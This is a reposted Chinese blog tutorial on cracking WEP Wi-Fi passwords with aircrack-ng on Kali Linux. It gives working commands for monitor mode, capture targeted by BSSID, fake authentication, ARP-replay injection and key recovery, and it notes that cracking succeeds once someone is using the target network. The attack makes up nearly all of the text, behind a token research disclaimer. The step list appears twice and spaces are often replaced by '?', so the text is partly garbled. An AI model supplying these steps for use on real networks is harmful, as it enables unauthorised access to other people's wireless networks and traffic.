Kali 获取WEP无线密码过程
生活随笔
收集整理的這篇文章主要介紹了
Kali 获取WEP无线密码过程
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
過年比較閑,之前用過kali來研究了下WEP的密碼強(qiáng)度,現(xiàn)在整理一下過程,用來備忘。(此教程僅用于個(gè)人研究,如有違法行為,后果自負(fù))
現(xiàn)在kali的版本升級(jí)到了2.0,升級(jí)或安裝后,自帶了aircrack,還需要一張無線網(wǎng)卡,注意安裝驅(qū)動(dòng)。
步驟: 1.airmon-ng 查看網(wǎng)卡信息 2.開始監(jiān)聽接口 airmon-ng start wlan0(根據(jù)上一步查看到的設(shè)備名) 3.掃描wifi信號(hào) airodump-ng wlan0mon(根據(jù)上一步得到的設(shè)備名) 4.開始抓包(根據(jù)上一步掃描到的wifi名) airodump-ng?-c?6?--bssid?AP's?MAC?-w?wep?mon0?(-c后面的6為AP工作頻道,--bissid后面的AP's?MAC?是要欲破解AP的MAC地址,-w后的wep的是抓下來的數(shù)據(jù)包DATA?保存的文件名(可以隨便取名),然后回車開始抓包。也可以加--ivs只抓 ivs包 5.獲取數(shù)據(jù)包的速度可能有點(diǎn)慢,可以再另開一個(gè)終端,輸入?aireplay-ng?-1?0?-e?ESSID?-a?AP's?MAC?-h?My?MAC?mon0?與AP建立虛擬連接不斷向其發(fā)包,也可以用arp注入加速發(fā)送流量。aireplay-ng -3 -b <ap mac> -h <my mac> wifi0。 6.收集有5000個(gè)以上的DATA之后,另開一個(gè)終端,輸入?sudo?aircrack-ng?wep*.cap?進(jìn)行解密?(如果沒算出來的話,繼續(xù)等,Ubuntu?aircrack-ng會(huì)在DATA每增加多5000個(gè)之后就自動(dòng)再運(yùn)行?,直到算出密碼為止) 。這里需要注意,如果沒有人用這個(gè)wifi可能就不能抓到密碼,等到有人用的時(shí)候就可以抓到密碼了。
現(xiàn)在kali的版本升級(jí)到了2.0,升級(jí)或安裝后,自帶了aircrack,還需要一張無線網(wǎng)卡,注意安裝驅(qū)動(dòng)。
步驟: 1.airmon-ng 查看網(wǎng)卡信息 2.開始監(jiān)聽接口 airmon-ng start wlan0(根據(jù)上一步查看到的設(shè)備名) 3.掃描wifi信號(hào) airodump-ng wlan0mon(根據(jù)上一步得到的設(shè)備名) 4.開始抓包(根據(jù)上一步掃描到的wifi名) airodump-ng?-c?6?--bssid?AP's?MAC?-w?wep?mon0?(-c后面的6為AP工作頻道,--bissid后面的AP's?MAC?是要欲破解AP的MAC地址,-w后的wep的是抓下來的數(shù)據(jù)包DATA?保存的文件名(可以隨便取名),然后回車開始抓包。也可以加--ivs只抓 ivs包 5.獲取數(shù)據(jù)包的速度可能有點(diǎn)慢,可以再另開一個(gè)終端,輸入?aireplay-ng?-1?0?-e?ESSID?-a?AP's?MAC?-h?My?MAC?mon0?與AP建立虛擬連接不斷向其發(fā)包,也可以用arp注入加速發(fā)送流量。aireplay-ng -3 -b <ap mac> -h <my mac> wifi0。 6.收集有5000個(gè)以上的DATA之后,另開一個(gè)終端,輸入?sudo?aircrack-ng?wep*.cap?進(jìn)行解密?(如果沒算出來的話,繼續(xù)等,Ubuntu?aircrack-ng會(huì)在DATA每增加多5000個(gè)之后就自動(dòng)再運(yùn)行?,直到算出密碼為止) 。這里需要注意,如果沒有人用這個(gè)wifi可能就不能抓到密碼,等到有人用的時(shí)候就可以抓到密碼了。
總結(jié)
以上是生活随笔為你收集整理的Kali 获取WEP无线密码过程的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: string.class是什么意思?
- 下一篇: 【BX学习之生活问题】 福建工商-个体户